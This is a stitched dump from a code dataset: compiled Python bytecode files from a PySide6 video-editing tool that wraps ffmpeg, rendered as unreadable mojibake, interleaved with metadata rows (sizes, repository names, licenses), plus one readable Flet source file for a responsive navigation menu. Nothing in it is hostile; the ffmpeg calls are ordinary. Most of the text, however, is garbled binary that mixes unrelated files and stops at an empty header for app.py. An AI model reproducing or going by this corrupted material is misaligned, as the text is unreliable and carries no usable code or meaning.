‰jj¦«‰jj ‰jj¦«‰j ¦«dSdSt5d d ‰¬ ¦«}| ¦«rt9jd¦«nt9jd¦«‰j d¦«‰j d¦«dSt5d d‰¬ ¦«}| ¦«rt9jd¦«dSt9jd¦«dS‰j ¦«dk�rä‰j ¦«dk�rƉj ¦«dk�s¨‰j›d‰j ›d�‰_!t5d d‰j›d‰j ›�‰¬ ¦«}| ¦«�rDtEj#‰d‰j ¦«d¦«\}}tdtjtj‰j ¦«|‰j!¦«‰_t'‰j¦«‰_‰jj ˆfd„¦«‰jj ˆfd„¦«‰jj ‰jj¦«‰jj ‰jj¦«‰j ¦«dSt9jd¦«dS‰j ¦«dkso‰j ¦«dkrTt5dd‰¬ ¦«}| ¦«rt9jd¦«dSt9jd¦«dSdSdS)NrWz 0:00:00:000u'执行简å�•转ç �任务,请ç¨�ç­‰...r"có8•—‰j d¦«S©Nu开始视频转ç �©rgrhr%s€rú<lambda>z)VencoInterface.encoding.<locals>.<lambda>1󸀏D¼L×<XÒ<XĞYmÑ<nÔ<n€rcó8•—‰j d¦«S©Nu完æˆ�视频转ç �rÏr%s€rrĞz)VencoInterface.encoding.<locals>.<lambda>2󸀏T¼\×=YÒ=YĞZnÑ=oÔ=o€ru!执行切割任务,请ç¨�ç­‰...r có8•—‰j d¦«SrÎrÏr%s€rrĞz)VencoInterface.encoding.<locals>.<lambda>;rÑrcó8•—‰j d¦«SrÓrÏr%s€rrĞz)VencoInterface.encoding.<locals>.<lambda><rÔruæ��示u6音频或字幕功能暂未å®�ç�°ï¼Œè¯·ç­‰å¾…æ›´æ–°ï¼�rEu确认,关闭æ��示窗å�£uå�–消,关闭æ��示窗å�£u输入文件ä¸�存在ï¼�r°u<进行音频转ç �,请选择输出文件,转ç �æ ¼å¼�为rŸrªr!có8•—‰j d¦«S)Nu开始音频转ç �rÏr%s€rrĞz)VencoInterface.encoding.<locals>.<lambda>]sø€°D´L×4PÒ4PĞQeÑ4fÔ4f€rcó8•—‰j d¦«S)Nu完æˆ�音频转ç �rÏr%s€rrĞz)VencoInterface.encoding.<locals>.<lambda>^sø€°T´\×5QÒ5QĞRfÑ5gÔ5g€rr u请选择输出文件ï¼�r¢r£)$ršr¤r¦rkrlrmr«r­ÚtimeEditÚ timeEdit_2rgrhrrrrriÚ toPlainTextr?r=ÚthreadÚstartedrtr#Ú deleteLaterÚstartr r§rnrpr›rRrSrTr r¥)rr¨Úaudio_output_file_pathr�s` rr}zVencoInterface.encoding$sOø€ğŒ~×"Ò"Ñ$Ô$¨Ò*Ñ*°4´>×3FÒ3FÑ3HÔ3HÈBÒ3NÑ3NåŒw�~Š~˜dœn×1Ò1Ñ3Ô3Ñ4Ô4ñ) >Ø”>×&Ò&Ñ(Ô(¨BÒ.Ñ.°4´>×3FÒ3FÑ3HÔ3HÈBÒ3NÑ3Nà”}×)Ò)Ñ+Ô+¨}Ò<Ñ<ÀÄ×AUÒAUÑAWÔAWĞ[hÒAhÑAhØœ ×4Ò4Ğ5^Ñ_Ô_Ğ_å&,¨^½VÔ=OÕQWÔQdĞfjÔft×fyÒfyÑf{Ôf{ğ~Bô~L÷~Qò~Qñ~Sô~SğUYôUg÷UsòUsñUuôUuñ'vô'v˜œ İ&2°4´;Ñ&?Ô&?˜œ Øœ Ô+×3Ò3Ğ4nĞ4nĞ4nĞ4nÑoÔoĞoØœ Ô,×4Ò4Ğ5oĞ5oĞ5oĞ5oÑpÔpĞpØœ Ô,×4Ò4°T´[Ô5LÑMÔMĞMØœ Ô,×4Ò4°T´[Ô5LÑMÔMĞMØœ ×)Ò)Ñ+Ô+Ğ+Ğ+Ğ+Ø!œ]×/Ò/Ñ1Ô1°]ÒBĞBÈ$Ì/×J^ÒJ^ÑJ`ÔJ`ĞdqÒJqÑJqØœ ×4Ò4Ğ5XÑYÔYĞYå&,¨_½fÔ>PÕRXÔReĞgkÔgu×gzÒgzÑg|Ôg|ğCôM÷RòRñTôTğVZôVc÷VhòVhñVjôVjğlpôl{÷l@òl@ñlBôlBğDHôDV÷DbòDbñDdôDdñ'eô'e˜œ İ&2°4´;Ñ&?Ô&?˜œ Øœ Ô+×3Ò3Ğ4nĞ4nĞ4nĞ4nÑoÔoĞoØœ Ô,×4Ò4Ğ5oĞ5oĞ5oĞ5oÑpÔpĞpØœ Ô,×4Ò4°T´[Ô5LÑMÔMĞMØœ Ô,×4Ò4°T´[Ô5LÑMÔMĞMØœ ×)Ò)Ñ+Ô+Ğ+Ğ+Ğ+ğKrĞJqõ# 8Ğ-eĞnrĞsÑsÔs�AØ—v’v‘x”xğBİœ Ğ%@ÑAÔAĞAĞAåœ Ğ%@ÑAÔAĞAØ”N×*Ò*¨2Ñ.Ô.Ğ.Ø”N×*Ò*¨2Ñ.Ô.Ğ.Ğ.Ğ.õ˜xĞ)CÈDĞQÑQÔQ�Ø—6’6‘8”8ğ>İ”LĞ!<Ñ=Ô=Ğ=Ğ=Ğ=å”LĞ!<Ñ=Ô=Ğ=Ğ=Ğ=à Œ^× Ò Ñ "Ô " bÒ (Ñ (¨T¬^×-@Ò-@Ñ-BÔ-BÀbÒ-HÑ-HĞQUÔQ_×QdÒQdÑQfÔQfĞjlÒQlÑQlØ%)¤[Ğ"BĞ"B°4´<Ğ"BĞ"BĞ"BˆDÔ å˜8ğ&AĞdhÔdoğ&Ağ&AĞrvÔr~ğ&Ağ&AğJNğOñOôOˆAØ�vŠv‰xŒxñ :İ,7Ô,GÈĞNbĞdhÔdr×dwÒdwÑdyÔdyğ|Eñ-Fô-FÑ)Ğ&¨å$ ^µVÔ5GÍÔI\Ğ^bÔ^l×^qÒ^qÑ^sÔ^sğvLğNRôNañbôb�” İ*¨4¬;Ñ7Ô7�” Ø” Ô#×+Ò+Ğ,fĞ,fĞ,fĞ,fÑgÔgĞgØ” Ô$×,Ò,Ğ-gĞ-gĞ-gĞ-gÑhÔhĞhØ” Ô$×,Ò,¨T¬[Ô-DÑEÔEĞEØ” Ô$×,Ò,¨T¬[Ô-DÑEÔEĞEØ” ×!Ò!Ñ#Ô#Ğ#Ğ#Ğ#å” Ğ8Ñ9Ô9Ğ9Ğ9Ğ9ğ ”×$Ò$Ñ&Ô&¨"Ò,Ğ,°´×1DÒ1DÑ1FÔ1FÈ"Ò1LĞ1Lå˜8Ğ%?ÈĞMÑMÔMˆAØ�vŠv‰xŒxğ :İ” Ğ8Ñ9Ô9Ğ9Ğ9Ğ9å” Ğ8Ñ9Ô9Ğ9Ğ9Ğ9ğ -Ğ,Ğ1LĞ1Lrr)r7r8r9rrUrHrIrJrKrurwryr{r€r•r‚r–r‡r‰r¿r‘r“r‹r�r„r�r}r:r;s@rrCrC9s¯ø€€€€€ğğğğğğğğğğğğğ"*ğ*ğ*ğ Jğ Jğ Jğ=ğ=ğ=ğ:9ğ9ğ9ğ :ğ :ğ :ğ9ğ9ğ9ğ :ğ :ğ :ğ Ağ Ağ AğAğAğAğ Ağ Ağ AğAğAğAğ =ğ=ğ=ğ2ğ2ğ2ğ =ğ =ğ =ğ2ğ2ğ2ğ 2ğ2ğ2ğ =ğ=ğ=ğ=ğ=ğ=ğ .ğ.ğ.ğEğEğEğK:ğK:ğK:ğK:ğK:ğK:ğK:rrC)rnrkÚPySide6.QtCorerrrrÚ PySide6.QtGuirrr ÚPySide6.QtWidgetsr r r Úqfluentwidgetsr Úmodules.configrÚmodules.ffmpegApirÚmodules.Ui_vencoInterfacerrprrrr=rCrMrrú<module>rès™ğØ€€€Ø € € € à7Ğ7Ğ7Ğ7Ğ7Ğ7Ğ7Ğ7Ğ7Ğ7Ğ7Ğ7Ø3Ğ3Ğ3Ğ3Ğ3Ğ3Ğ3Ğ3Ğ3Ğ3Ø?Ğ?Ğ?Ğ?Ğ?Ğ?Ğ?Ğ?Ğ?Ğ?Ø%Ğ%Ğ%Ğ%Ğ%Ğ%à!Ğ!Ğ!Ğ!Ğ!Ğ!Ø$Ğ$Ğ$Ğ$Ğ$Ğ$Ø-Ğ-Ğ-Ğ-Ğ-Ğ-ğ  €„ Ğ ?¨6Ô+=Ğ ?Ğ ?Ñ@Ô@Ğ@Ø €„ Ğ A¨FÔ,?Ğ AĞ AÑBÔBĞBğRğRğRğRğRˆWñRôRğRğ:&ğ&ğ&ğ&ğ&�7ñ&ô&ğ&ğv:ğv:ğv:ğv:ğv:�W˜gñv:ôv:ğv:ğv:ğv:r
30,908
Python
.pyt
59
522.813559
3,657
0.286062
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,466
ffmpegApi.cpython-311.pyc
wish2333_VideoExtractAndConcat/modules/__pycache__/ffmpegApi.cpython-311.pyc
§ »ÏIf+>ãóT—ddlZddlZddlZddlZddlZddlmZGd„d¦«ZdS)éN)ÚffpathcóÜ—eZdZejejddfd„Zdd„Zd„Zd„Z d„Z d „Z d „Z d „Z dd„Z dd„Z dd„Zd d„Z d!d„Z d!d„Z d"d„Z d#d„Z d$d„Z d#d„ZdS)%ÚFFmpegFNcó>—||_||_||_||_dS©N)Ú ffmpeg_pathÚ ffprobe_pathÚinterrupt_flagÚcallback)Úselfrr r r s õMq:\Git\FFmpeg-python\code-version-pre4.0-多界é�¢å¼€å�‘\modules\ffmpegApi.pyÚ__init__zFFmpeg.__init__s'€ğ 'ˆÔØ(ˆÔØ,ˆÔØ ˆŒ ˆ ˆ óTcó—||_dSr)r )r Úflags r Úupdate_interrupt_flagzFFmpeg.update_interrupt_flags€Ø"ˆÔĞĞrcóš—|jstjd¦«|j¯tjd¦«| ¦«dS)Néuffmpegapi检测到中断请求)r ÚtimeÚsleepÚloggingÚinfoÚ interrupt_run©r s r Úcheck_interrupt_flagzFFmpeg.check_interrupt_flagsR€ØÔ%ğ å ŒJ�q‰MŒMˆMğÔ%ğ õ Œ Ğ5Ñ6Ô6Ğ6Ø ×ÒÑÔĞĞĞrcó¶—|jr½tjd¦«|j ¦«|j d¬¦«|j ¦«€|j ¦«t|j ¦«r|  ¦«d|_tjd¦«tjd¦«dS)Nuå°�试终止FFmpeg进程é)ÚtimeoutFuFFmpeg进程强制终止uffmpegapi中断请求已处ç�†) r rrÚpÚ terminateÚwaitÚpollÚkillÚcallabler rs r rzFFmpeg.interrupt_run"s¶€Ø Ô ğ 5å ŒLĞ3Ñ 4Ô 4Ğ 4Ø ŒF× Ò Ñ Ô Ğ Ø ŒF�KŠK ˆKÑ "Ô "Ğ "ØŒv�{Š{‰}Œ}Ğ$Ø”— ’ ‘ ” � ݘœ Ñ&Ô&ğ Ø— ’ ‘”�Ø"'ˆDÔ İ ŒLĞ3Ñ 4Ô 4Ğ 4İŒ Ğ5Ñ6Ô6Ğ6Ğ6Ğ6rcó—d} |jg|z}d |¦«}tjd|›�¦«t j|tjtj¬¦«|_tj |j ¬¦«}d|_ |  ¦«| ¦«rtjd¦«ntjd¦« |jj ¦« d¦«}|s|j ¦«�n(ŒOtj| ¦«¦«Œu|j ¦«\}}|jjd krLtjd | d¦«›�¦«t/| d¦«¦«‚nq#t0$r}tjd ¦«|‚d}~wt2$r}tjd ¦«|‚d}~wt.$r} tjd | ›�¦«| ‚d} ~ wwxYw tjd¦«|rL| ¦«r:d|_| ¦«d|_tjd¦«dSdSdS#tjd¦«|rK| ¦«r8d|_| ¦«d|_tjd¦«wwwxYw)Nú uå°�试执行:)ÚstdoutÚstderr)ÚtargetTuå�¯åŠ¨å®ˆå�«çº¿ç¨‹æˆ�功uå�¯åŠ¨å®ˆå�«çº¿ç¨‹å¤±è´¥zutf-8ru$命令执行失败,错误信æ�¯ï¼šuZ找ä¸�到ffmpeg或ffprobe命令,请检查ffmpeg_pathå’Œffprobe_path是å�¦æ­£ç¡®é…�置。ucffmpeg或ffprobe命令没有执行æ�ƒé™�,请检查ffmpeg_pathå’Œffprobe_path是å�¦æ­£ç¡®é…�置。u执行FFmpeg命令失败:uFFmpeg命令执行完æˆ�Fu守å�«çº¿ç¨‹é€€å‡º)rÚjoinrrÚ subprocessÚPopenÚPIPEÚSTDOUTrÚ threadingÚThreadrÚdaemonÚstartÚis_aliveÚerrorr'ÚreadlineÚdecoder"ÚstripÚ communicateÚ returncodeÚ ExceptionÚFileNotFoundErrorÚPermissionErrorr ) r ÚcmdÚtÚcmd_strÚlineÚoutÚerrÚ fnf_errorÚp_errorÚes r Úrunz FFmpeg.run2s!€ğ ˆğ0 3ØÔ#Ğ$ sÑ*ˆCØ—h’h˜s‘m”mˆGİ ŒLĞ4¨7Ğ4Ğ4Ñ 5Ô 5Ğ 5åÔ%Øİ!”İ!Ô(ğñôˆDŒFõ Ô ¨Ô(AĞBÑBÔBˆA؈AŒHØ �GŠG‰IŒIˆIØ�zŠz‰|Œ|ğ :İ” Ğ7Ñ8Ô8Ğ8Ğ8å” Ğ8Ñ9Ô9Ğ9ğ +Ø”v”}×-Ò-Ñ/Ô/×6Ò6°wÑ?Ô?�Øğ!à”v—{’{‘}”}Ğ0Øà İ” ˜TŸZšZ™\œ\Ñ*Ô*Ğ*ğ +ğ”v×)Ò)Ñ+Ô+‰HˆC�ØŒvÔ  AÒ%Ğ%İ” ĞYÀCÇJÂJÈwÑDWÔDWĞYĞYÑZÔZĞZİ § ¢ ¨7Ñ 3Ô 3Ñ4Ô4Ğ4ğ&øõ!ğ ğ ğ İ ŒMĞwÑ xÔ xĞ x؈Oøøøøİğ ğ ğ İ ŒMğAñ Bô Bğ B؈Møøøøİğ ğ ğ İ ŒMĞ;¸Ğ;Ğ;Ñ <Ô <Ğ <؈Gøøøøğ øøøğ&õ ŒLĞ3Ñ 4Ô 4Ğ 4Øğ 3�Q—Z’Z‘\”\ğ 3Ø&*�Ô#Ø—’‘”�Ø&+�Ô#İ” Ğ1Ñ2Ô2Ğ2Ğ2Ğ2ğ  3ğ 3ğ 3ğ 3øõ ŒLĞ3Ñ 4Ô 4Ğ 4Øğ 3�Q—Z’Z‘\”\ğ 3Ø&*�Ô#Ø—’‘”�Ø&+�Ô#İ” Ğ1Ñ2Ô2Ğ2Ğ2ğ  3ğ 3øøøsC„GG Ç J$Ç H:ÇG,Ç, H:Ç9HÈ H:ÈH5È5H:È:J$Ê$A$Lcó.—| dg¦«S)Nz-version)rFrs r ÚversionzFFmpeg.versionis€Ø�xŠx˜˜ Ñ%Ô%Ğ%rcóÜ—|jdddddd|g}tjdd |¦«z¦«t j|d d ¬ ¦«}|j ¦«}|stjd ¦«dS t|¦«}tjd t|¦«z¦«|S#t$r)}tj d t|¦«¦«|‚d}~wwxYw)Nz-vr4z -show_entrieszformat=durationz-ofz"default=noprint_wrappers=1:nokey=1u 执行:r&T)Úcapture_outputÚtextu5ffprobe 输出为空,无法è�·å�–视频æŒ�ç»­æ—¶é—´u视频总秒数为:u0转æ�¢è§†é¢‘æŒ�续时间为浮点数时出错:) r rrr*r+rFr'r7ÚwarningÚfloatÚstrÚ ValueErrorr4)r Ú input_fileÚcmd1Úresultr'ÚdurationrEs r Ú get_durationzFFmpeg.get_durationmsú€ğ Ô Ø �'˜?Ğ,=¸uĞFjØ ğ ˆõ Œ �[ 3§8¢8¨D¡>¤>Ñ1Ñ2Ô2Ğ2İ” °TÀĞEÑEÔEˆà”×$Ò$Ñ&Ô&ˆØğ İ ŒOĞSÑ TÔ TĞ TØ�4ğ ݘV‘}”}ˆHİ ŒLĞ0µ3°x±=´=Ñ@Ñ AÔ AĞ A؈Oøİğ ğ ğ İ ŒMĞLÍcĞRSÉfÌfÑ UÔ UĞ U؈Gøøøøğ øøøsÂ4B8Â8 C+Ã$C&Ã&C+có¸—tj|¦«| d¦«\}}}}t|¦«}t|¦«}|dz|dzzt|¦«z}|t|¦«dz z }||z }tjd|¦«t |d¦«\} } t | d¦«\} } d| | | fz} tjd| ¦«| S)NÚ:ié<ièu结æ�Ÿæ—¶é—´ç‚¹ä¸ºï¼šz%02d:%02d:%06.3f)rrÚsplitrMÚdivmod) r rSÚendÚhoursÚminutesÚsecondsÚ millisecondsÚ end_floatÚend_time_floatÚmÚsÚhÚend_times r Útime_calculatezFFmpeg.time_calculate…s݀݌ �SÑÔĞà03· ² ¸#±´Ñ-ˆˆw˜ İ�e‘ ” ˆİ˜‘.”.ˆØ˜D‘L 7¨R¡<Ñ/µ%¸±.´.Ñ@ˆ Ø•U˜<Ñ(Ô(¨4Ñ/Ñ/ˆ Ø! IÑ-ˆİŒ Ğ,¨nÑ=Ô=Ğ=å�n bÑ)Ô)‰ˆˆ1İ�a˜‰}Œ}‰ˆˆ1Ø%¨¨A¨q¨ Ñ1ˆİŒ Ğ,¨hÑ7Ô7Ğ7؈rú-c:v copy -c:a copyú-ycóP—tj|¦«D�]}| d¦«ràtj ||¦«}tj |¦«stj|¦«tj ||¦«} | |¦«} | | |¦«} d|d|d| ddd|›d�|d| ›d�g } |  | ¦«tj |dz¦«Œøtj |d z¦«�ŒdS) Nú.mp4ú -hide_bannerú-ssú-toú-accurate_seekú-iú"õ视频截å�–完æˆ�õä¸�是mp4文件,跳过) ÚosÚlistdirÚendswithÚpathr*ÚexistsÚmakedirsrTrerFrr) r Ú input_folderÚ start_timerZÚ output_folderÚencoderÚ overwriteÚfilerPÚ output_filerSrdr=s r Ú extract_videozFFmpeg.extract_video—s9€õ”J˜|Ñ,Ô,ğ @ñ @ˆDØ�}Š}˜VÑ$Ô$ğ @İœWŸ\š\¨,¸Ñ=Ô=� å”w—~’~ mÑ4Ô4ğ/İ”K  Ñ.Ô.Ğ.İ œgŸlšl¨=¸$Ñ?Ô?� à×,Ò,¨ZÑ8Ô8�à×.Ò.¨x¸Ñ=Ô=�ğ#ØØ˜:ؘ8Ø$ØĞ+˜jĞ+Ğ+Ğ+ØØ&˜ Ğ&Ğ&Ğ&ğ(�ğ—’˜‘ ” � İ” ˜TĞ$8Ñ8Ñ9Ô9Ğ9Ğ9å” ˜TĞ$>Ñ>Ñ?Ô?Ğ?Ñ?ğ5 @ğ @rc óL—|dd…dz|dd…z}| |¦«}| ||¦«}d|d|d|ddd |›d �|d |›d �g } | | ¦«tj |¦«} t j| d z¦«dS© Néú.érjrkrlrmrnrorp)rTrerFrrruÚbasenamerr) r rPr~ryrZr{r|rSrdr=r}s r Úextract_video_singlezFFmpeg.extract_video_single½sˀ𠠠 ”^ cÑ)¨J°q°r°r¬NÑ:ˆ à×$Ò$ ZÑ0Ô0ˆà×&Ò& x°Ñ5Ô5ˆğ Ø Ø �:Ø �8Ø Ø Ğ#�jĞ#Ğ#Ğ#Ø Ø � Ğ Ğ Ğ ğ ˆğ �Š�‰ Œ ˆ İŒw×Ò  Ñ+Ô+ˆİŒ �TĞ0Ñ0Ñ1Ô1Ğ1Ğ1Ğ1rc ó&—|dd…dz|dd…z}|dd…dz|dd…z}d|d|d|ddd |›d �|d |›d �g }| |¦«tj |¦«}t j|d z¦«dSr�©rFrrrur…rr) r rPr~ryrdr{r|r=r}s r Ú cut_videozFFmpeg.cut_videoÚsÀ€ğ    ”^ cÑ)¨J°q°r°r¬NÑ:ˆ ؘB˜Q˜B”< #Ñ%¨°°°¬ Ñ4ˆà Ø Ø �:Ø �8Ø Ø Ğ#�jĞ#Ğ#Ğ#Ø Ø � Ğ Ğ Ğ ğ ˆğ �Š�‰ Œ ˆ İŒw×Ò  Ñ+Ô+ˆİŒ �TĞ0Ñ0Ñ1Ô1Ğ1Ğ1Ğ1rúH-c:v libx264 -preset veryfast -crf 23 -c:a aac -b:a 192k -ar 44100 -ac 2có—tj|¦«D]ì}| d¦«r¾tj ||¦«}tj |¦«stj|¦«tj ||¦«} d|dd|›d�dd|›d�dd|›d�dd|d| ›d�g } | | ¦«tj |dz¦«ŒÕtj |dz¦«ŒídS) Nrirjrnroú-filter_complexa}"[0:v]fps=30,scale=1280:720,setsar=1[v0];[1:v]fps=30,scale=1280:720,setsar=1[v1];[2:v]fps=30,scale=1280:720,setsar=1[v2];[0:a]aformat=sample_rates=44100:channel_layouts=stereo[a0];[1:a]aformat=sample_rates=44100:channel_layouts=stereo[a1];[2:a]aformat=sample_rates=44100:channel_layouts=stereo[a2];[v0][a0][v1][a1][v2][a2]concat=n=3:v=1:a=1[vout][aout]" -map "[vout]" -map "[aout]"õ视频å�ˆå¹¶å®Œæˆ�rq) rrrsrtrur*rvrwrFrr) r rxÚ input_file1Ú input_file2rzr{r|r}rPr~r=s r Úmerge_video_folderzFFmpeg.merge_video_folderòs-€å”J˜|Ñ,Ô,ğ @ğ @ˆDØ�}Š}˜VÑ$Ô$ğ @İœWŸ\š\¨,¸Ñ=Ô=� å”w—~’~ mÑ4Ô4ğ/İ”K  Ñ.Ô.Ğ.İ œgŸlšl¨=¸$Ñ?Ô?� ğ#ØØĞ,˜kĞ,Ğ,Ğ,ØĞ+˜jĞ+Ğ+Ğ+ØĞ,˜kĞ,Ğ,Ğ,Ø%ğTØØ&˜ Ğ&Ğ&Ğ&ğ (�ğ—’˜‘ ” � İ” ˜TĞ$8Ñ8Ñ9Ô9Ğ9Ğ9å” ˜TĞ$>Ñ>Ñ?Ô?Ğ?Ğ?ğ/ @ğ @rú 1920:1080Ú30c óş—d|dd|›d�dd|›d�dd|›d�dd|›d|›d|›d|›d|›d|›d � |d|›d�g } | | ¦«tj |¦«} t j| d z¦«dS) NrjrnrorŒú "[0:v]fps=ú,scale=ú,setsar=1[v0];[1:v]fps=z,setsar=1[v1];[2:v]fps=a,setsar=1[v2];[0:a]aformat=sample_rates=44100:channel_layouts=stereo[a0];[1:a]aformat=sample_rates=44100:channel_layouts=stereo[a1];[2:a]aformat=sample_rates=44100:channel_layouts=stereo[a2];[v0][a0][v1][a1][v2][a2]concat=n=3:v=1:a=1[vout][aout]" -map "[vout]" -map "[aout]"rprˆ) r rPr~r�r�r{Ú resolutionÚfpsr|r=r}s r Ú merge_videozFFmpeg.merge_videos€ğ Ø Ø Ğ$�kĞ$Ğ$Ğ$Ø Ğ#�jĞ#Ğ#Ğ#Ø Ğ$�kĞ$Ğ$Ğ$Ø ğ b˜ğ bğ b Zğ bğ bÈğ bğ bĞT^ğ bğ bĞwzğ bğ bğDNğ bğ bğ bØ Ø � Ğ Ğ Ğ ğ  ˆğ �Š�‰ Œ ˆ İŒw×Ò  Ñ+Ô+ˆİŒ �TĞ0Ñ0Ñ1Ô1Ğ1Ğ1Ğ1rcóæ—d|dd|›d�dd|›d�dd|›d|›d|›d|›d� |d|›d�g }| |¦«tj |¦«} t j| d z¦«dS) NrjrnrorŒr”r•r–zÏ,setsar=1[v1];[0:a]aformat=sample_rates=44100:channel_layouts=stereo[a0];[1:a]aformat=sample_rates=44100:channel_layouts=stereo[a1];[v0][a0][v1][a1]concat=n=2:v=1:a=1[vout][aout]" -map "[vout]" -map "[aout]"r�rˆ) r Úop_filer~Úed_filer{r—r˜r|r=r}s r Úmerge_video_twozFFmpeg.merge_video_two)sÆ€ğ Ø Ø �.�g�.�.�.Ø �.�g�.�.�.Ø ğ p˜ğ pğ p Zğ pğ pÈğ pğ pĞT^ğ pğ pğ pØ Ø � Ğ Ğ Ğ ğ ˆğ �Š�‰ Œ ˆ İŒw×Ò  Ñ,Ô,ˆİŒ �TĞ0Ñ0Ñ1Ô1Ğ1Ğ1Ğ1rú-acodec aac -b:a 128k có¼—d|dd|›d�|d|›d�g}| |¦«tj |¦«}t j|dz¦«dS)Nrjrnrou音频转ç �完æˆ�rˆ©r rPr~r{r|r=r}s r Ú audio_encodezFFmpeg.audio_encodeHóu€ğ Ø Ø Ø � Ğ Ğ Ğ Ø Ø � Ğ Ğ Ğ ğ  ˆğ �Š�‰ Œ ˆ İŒw×Ò  Ñ+Ô+ˆİŒ �TĞ0Ñ0Ñ1Ô1Ğ1Ğ1Ğ1rú<-vcodec libx264 -preset medium -crf 23 -acodec aac -b:a 128kcó¼—d|dd|›d�|d|›d�g}| |¦«tj |¦«}t j|dz¦«dS)Nrjrnrou视频转ç �完æˆ�rˆr s r Ú video_encodezFFmpeg.video_encodeZr¢rrc óÌ—d|dd|›d�d|›d|›d�|d|›d�g}| |¦«tj |¦«}t j|dz¦«dS)Nrjrnroz!-filter_complex "[0:v]setpts=PTS/z[v];[0:a]atempo=z[a]" -map "[v]" -map "[a]"u视频加速完æˆ�rˆ)r rPr~Úrater{r|r=r}s r Úaccelerated_encodezFFmpeg.accelerated_encodels‹€ğ Ø Ø Ø � Ğ Ğ Ğ Ø f°Ğ fĞ fÀdĞ fĞ fĞ fØ Ø � Ğ Ğ Ğ ğ ˆğ �Š�‰ Œ ˆ İŒw×Ò  Ñ+Ô+ˆİŒ �TĞ0Ñ0Ñ1Ô1Ğ1Ğ1Ğ1rc óÀ—d|dd|›d�|||d|›d�g}| |¦«tj |¦«}t j|dz¦«dS)Nrjrnrou视频字幕混å�ˆå®Œæˆ�rˆ) r rPr~ÚaudioÚsubtitler{r|r=r}s r Ú avsmix_encodezFFmpeg.avsmix_encode€s{€ğ Ø Ø Ø � Ğ Ğ Ğ Ø Ø Ø Ø � Ğ Ğ Ğ ğ  ˆğ �Š�‰ Œ ˆ İŒw×Ò  Ñ+Ô+ˆİŒ �TĞ6Ñ6Ñ7Ô7Ğ7Ğ7Ğ7r)T)rfrg)rŠrg)rŠr‘r’rg)r�rg)r£rg)rr£rg)Ú__name__Ú __module__Ú __qualname__rrr rrrrrFrHrTrerr†r‰r�r™r�r¡r¥r¨r¬©rr rr sÚ€€€€€ğÔ&ØÔ(ØØğ !ğ !ğ !ğ !ğ#ğ#ğ#ğ#ğğğğ 7ğ 7ğ 7ğ 43ğ43ğ43ğn&ğ&ğ&ğğğğ0ğğğ.&Øğ #@ğ#@ğ#@ğ#@ğV&Øğ 2ğ2ğ2ğ2ğD&Øğ 2ğ2ğ2ğ2ğ0@ğ@ğ@ğ@ğB[ØØ Øğ2ğ2ğ2ğ2ğ>[ØØ Øğ2ğ2ğ2ğ2ğD,Øğ 2ğ2ğ2ğ2ğ*RØğ 2ğ2ğ2ğ2ğ*ØQØğ 2ğ2ğ2ğ2ğ2RØğ 8ğ8ğ8ğ8ğ8ğ8rr)r+rrrrr/Úmodules.configrrr°rr ú<module>r²sˆğğĞĞĞØ € € € Ø€€€Ø € € € ØĞĞĞà!Ğ!Ğ!Ğ!Ğ!Ğ!ğG8ğG8ğG8ğG8ğG8ñG8ôG8ğG8ğG8ğG8r
17,152
Python
.pyt
68
251.014706
1,242
0.322212
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,467
__init__.cpython-311.pyc
wish2333_VideoExtractAndConcat/modules/__pycache__/__init__.cpython-311.pyc
§ bV?fgãó&—ddlTddlTddlTddlZdS)é)Ú*N)ÚPySide6.QtCoreÚ PySide6.QtGuiÚPySide6.QtWidgetsÚos©óõEQ:\Git\FFmpeg-python\code-version-pre2.0-é‡�æ�„UI\modules\__init__.pyú<module>r s6ğØĞĞĞØĞĞĞØĞĞĞØ € € € € € r
313
Python
.pyt
2
155
309
0.483974
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,468
reactive_menu.py
redtardis12_Sky-Keys-interactive/reactive_menu.py
import flet from flet import AppBar from flet import Card from flet import Column from flet import Container from flet import Icon from flet import IconButton from flet import NavigationRail from flet import NavigationRailDestination from flet import Page from flet import Row from flet import Stack from flet import Text from flet import UserControl from flet import VerticalDivider from flet import colors from flet import icons class ResponsiveMenuLayout(Row): def __init__(self, page, pages, *args, **kwargs): super().__init__(*args, **kwargs) self.expand = True self.page = page self.pages = pages navigation_items = [navigation_item for navigation_item, _ in pages] self.navigation_rail = self._build_navigation_rail(navigation_items) page_contents = [page_content for _, page_content in pages] self.menu_panel = Row( controls=[self.navigation_rail, VerticalDivider(width=1)], spacing=0, ) self.content_area = Column(page_contents, expand=True) self._was_portrait = self.is_portrait() self._panel_visible = self.is_landscape() self.set_navigation_content() self._change_displayed_page() self.page.on_resize = self.handle_resize def select_page(self, page_number): self.navigation_rail.selected_index = page_number self._change_displayed_page() def _navigation_change(self, e): self._change_displayed_page() def _change_displayed_page(self): selected_index = self.navigation_rail.selected_index # page_contents = [page_content for _, page_content in self.pages] for i, content_page in enumerate(self.content_area.controls): content_page.visible = selected_index == i self.check_toggle_on_select() self.page.update() def _build_navigation_rail(self, navigation_items): return NavigationRail( selected_index=0, label_type="all", #extended=True, destinations=navigation_items, on_change=self._navigation_change, ) def handle_resize(self, e): if self._was_portrait != self.is_portrait(): self._was_portrait = self.is_portrait() self._panel_visible = self.is_landscape() self.set_navigation_content() self.page.update() def toggle_navigation(self): self._panel_visible = not self._panel_visible self.set_navigation_content() self.page.update() def check_toggle_on_select(self): if self.is_portrait() and self._panel_visible: self.toggle_navigation() def set_navigation_content(self): if self.is_landscape(): self.add_landscape_content() else: self.add_portrait_content() def add_landscape_content(self): self.controls = [self.menu_panel, self.content_area] self.menu_panel.visible = self._panel_visible def add_portrait_content(self): self.controls = [Stack(controls=[self.content_area, self.menu_panel], expand=True)] self.menu_panel.visible = self._panel_visible def is_portrait(self) -> bool: # Return true if window/display is narrow return self.page.window_height >= self.page.window_width def is_landscape(self) -> bool: # Return true if window/display is wide return self.page.window_width > self.page.window_height
3,496
Python
.py
86
32.988372
91
0.666273
redtardis12/Sky-Keys-interactive
8
0
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,469
app.py
redtardis12_Sky-Keys-interactive/app.py
